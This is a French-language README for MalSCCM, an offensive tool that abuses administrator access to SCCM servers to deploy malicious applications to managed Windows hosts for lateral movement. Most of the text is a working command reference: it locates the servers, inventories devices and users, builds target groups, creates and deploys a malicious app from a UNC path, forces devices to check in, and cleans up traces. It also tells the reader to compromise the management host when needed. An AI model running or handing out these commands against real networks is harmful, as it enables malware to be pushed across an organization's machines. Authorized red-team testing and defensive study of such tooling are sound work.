
Abuser des serveurs SCCM pour déployer des applications malveillantes sur les hôtes gérés afin de faciliter les mouvements latéraux et les opérations d'équipe rouge.
Cet outil permet d'abuser des serveurs SCCM locaux ou distants pour déployer des applications malveillantes sur les hôtes qu'ils gèrent. Pour utiliser cet outil, votre processus actuel doit disposer de droits administrateur sur le serveur SCCM.
En général, les déploiements de SCCM placent le serveur de gestion et le serveur principal sur le même hôte. Dans ce cas, l'hôte renvoyé par la commande locate peut être utilisé comme serveur principal.
Si ce n'est pas le cas, vous devrez compromettre l'hôte de gestion renvoyé par locate, afin de pouvoir exécuter à nouveau locate sur cet hôte et obtenir le nom d'hôte du serveur principal. Une fois que vous avez cela et un accès administrateur, vous êtes prêt !
Pour plus d'informations sur l'utilisation de l'outil, consultez le blog ci-dessous.
Un immense merci à PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) sur lequel tout cela est basé ; ce travail n'aurait pas été possible sans les contributions de @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.
Les commandes listées ci-dessous ont des paramètres optionnels entre <>.
Tenter de trouver les serveurs de gestion et principal SCCM :
MalSCCM.exe locate
Inspecter le serveur principal pour recueillir des informations SCCM :
MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
Créer/Modifier/Supprimer des groupes pour ajouter des cibles en vue de déployer des applications malveillantes. Les groupes peuvent être destinés aux périphériques ou aux utilisateurs :
MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
Créer/Déployer/Supprimer des applications malveillantes :
MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
Forcer les périphériques d'un groupe à vérifier les mises à jour dans les minutes qui suivent :
MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>